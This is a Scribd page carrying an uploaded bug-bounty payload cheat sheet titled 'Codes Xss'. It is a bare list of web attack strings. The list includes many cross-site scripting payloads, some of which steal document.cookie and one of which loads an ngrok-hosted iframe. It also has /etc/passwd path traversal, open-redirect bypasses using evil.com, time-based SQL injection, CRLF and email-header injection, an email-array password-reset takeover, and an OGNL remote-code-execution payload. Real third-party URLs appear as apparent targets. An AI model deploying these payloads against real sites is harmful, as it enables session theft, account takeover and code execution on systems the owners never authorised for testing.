Scribd Logo
Upload

Welcome to Scribd!

  • Codes Xss

    Uploaded by

    tarun.cyber14
    12 views4 pages

    Original Title

    codes xss

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    12 views4 pages

    Codes Xss

    Uploaded by

    tarun.cyber14

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 4

    create passworddirectly url

    <img src="http://evanricafort.com/profile.png">

    https://awsr.com.au/wp-content/plugins/awsr-manager/?MD

    https://marlcoatings.co.uk/__MACOSX/app/code/core/Mage/Admin/sql/

    ">'><details/open/ontoggle=confirm('XSS')>

    <</p>iframe src=javascript:alert()//
    <img src=x:alert(alt) onerror=eval(src) alt=xss>
    <a href="javascript&#x3ax=1;alert(1)">click
    "&#58", "&#x3ax=1;"
    </script><script>prompt(document.domain)</script>
    <style/><img src="z'z</style><script/z>alert(1)</script>">

    <svg/OnLoad="`${prompt``}`">
    "><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
    <p>He bugs<i>The hacker</i>,hack.</p>
    </script><!--><svg onload=[document.domain].find%26%2340;alert%26rpar;>

    </script><!--><svg onload=["_Y000!_"].find%26%2340;alert%26rpar;>
    ? "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain)
    //># ?

    <iframe src="http://evanricafort.com/profile.png"></iframe>
    <sVg/oNloAd=�JaVaScRiPt:/**\/*\�/�\
    eval(atob(�Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==�))�> <iframe
    src=jaVaScrIpT:eval(atob(�Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==�))>

    <font color="red">Bugs</font>
    abcabc\"><svg/onload=confirm(1)>
    x"autofocus/onfocus=lert(/O/)+"
    javascript:prompt(document.cookie);//
    <svg onload=confirm(document.domain)>
    <imsofake%20onpointerrawupdate=window[%27alert%27](0)>xss
    <</div>script</div>>alert()<</div>/script</div>>

    <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>


    sdf<script>alert(12)</script>
    <script> src="{https)://server.com/xss.js">
    <iframe <><a href=javascript&colon;alert(document.cookie)>Click
    Here</a>=&gt;&lt;/iframe&gt;
    LFI - Accept: ../../../../../../../../../etc/passwd{{
    GET /root:x:0:0:root:/root:/bin/bash
    ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
    %3C/SCRIPT%3E%3CSCRIPT%3Ealert(document.domain);%3C/SCRIPT%3E

    javascript:alert(document.cookie)//

    ">'><details/open/ontoggle=confirm('XSS')>
    -alert(1)//\

    ''-prompt`1`-'',
    ''-confirm`1`-'',
    <math><xxlink:href=javascript:confirm`1`>click
    "oncut="alert()
    1st Injection: */</script><!--
    2nd Injection: */.domain)/*xxx
    3rd Injection:*/(document/*xx
    4th Injection: */prompt/*xxxxx
    5th Injection: "><script>/*xss
    sac-bugc

    ssrf

    "><img src="xasdasdasd" onerror="document.write('<iframe


    src=http://fa5df2f7.ngrok.io></iframe>')" />
    <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
    http://web.archive.org/cdx/search/cdx?url=*.domain/
    *&output=json&fl=original&collapse=urlkey&page=

    '"<svg/onload=prompt(5);>((7*7}}
    <svg onload="alert(1)" <=''' svg='''
    <Svg='''' onload=''''
    %E5%98%8A%E5%98%8DSet-Cookie:%20test
    �onmouseover=alert(document.domain)�

    ?t=test'*self['alert'](document['domain'])*'test
    onerror=eval;throw'=alert\x28document\x2edomain\x29';
    [Click Me](javascript:alert('xss'))
    <noscript><p title="</noscript><img src=x onerror=alert(1)>">

    "><img src=x onerror=prompt(document.cookie);>


    <script>window.location='https://www.google.com'</script>
    <IFRAME src="http://www.cnn.com"></IFRAME>
    <script>alert(document.cookies)</script>

    <svg onload="alert(document.cookies)">
    "'<svg/onload=prompt(document.cookie);>

    <ScRipT>AlErT("hello");</script>

    "></script><ScRipT>AlErT("hello");</script>
    <input type="text" name="state" value="INPUT_FROM_USER">
    <IFRAME src=javasript:alert("hackingmonks");"></IFRAME>

    <IFRAME src=");"></IFRAME>

    "><img src=x onerror=prompt``>


    <img src=xss onerror=alert(1)>
    <svg onload=alert(hi)>

    https://business.pinterest.com/en/agencies/client-submission?
    utm_source=business_pinterest&utm_medium=agencies_landing&utm_campaign=propel

    https://help.pinterest.com/en/landing/request-a-feature?
    utm_source=pinterest&utm_medium=settings&utm_campaign=request_a_feature_exp

    https://www.pinterestcareers.com/jobs/account-manager-field-sales-tech-telco-new-
    york-united-states
    {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
    abc`;return+false});});alert`xss`;</script>
    ////google%E3%80%82com
    //google.com?
    ///www.x.com@evil.com/
    http:evil.com
    //.@.@google.com
    /\youtube.com
    //2130706433
    //0x7f000001
    //3627732462
    //1113625217
    //google
    //google@google.com
    Http:3627732462
    http:http:evil[.]com
    http:/evil%252ecom
    ///www.x.com@evil.com
    /%0D/google.com
    java%0a%0ascript%0d%0d:alert(0)
    %0d%0ahttp://google.com
    %257B%257B7*7%257D%257D

    'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
    'XOR(if(now()=sysdate(),sleep(6*6-30),0))OR'
    referer- '+(select*from(select(sleep(10}}}a)+'

    privilege escalation-
    first_name=hacker&last_name=hacker&location=�&tags=�&custom_field_values=�&email=sa
    met%40wearehackerone.com&license_type=licensed
    &billability_target=1337&billrate=1337

    /_clockwork

    root@kali:~/ParamSpider# python3 paramspider.py --domain https://electroneum.com

    {�email�:[�victim@gmail.com�,�attacker@gmail.com�],�token�:�some random token�}

    Intercept the request and put email:victim mail%0d%0acc:hacker mail id. The server
    sends an email with CC attacker email.

    Rce-

    redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{�


    ifconfig�})).start(),#b=#a.getInputStream(),#c=new
    java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new
    char[50000],#d.read(#e),#matt=#context.get(�com.opensymphony.xwork2.dispatcher.Http
    ServletResponse�),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.get
    Writer().close()}

    PleaseSubscribe@gmail.com%0d%0aCC%3sachin272516@gmail.com%0d%0aszh%3a
    https://education.23andme.com/wp-includes/wlwmanifest.xml

    You might also like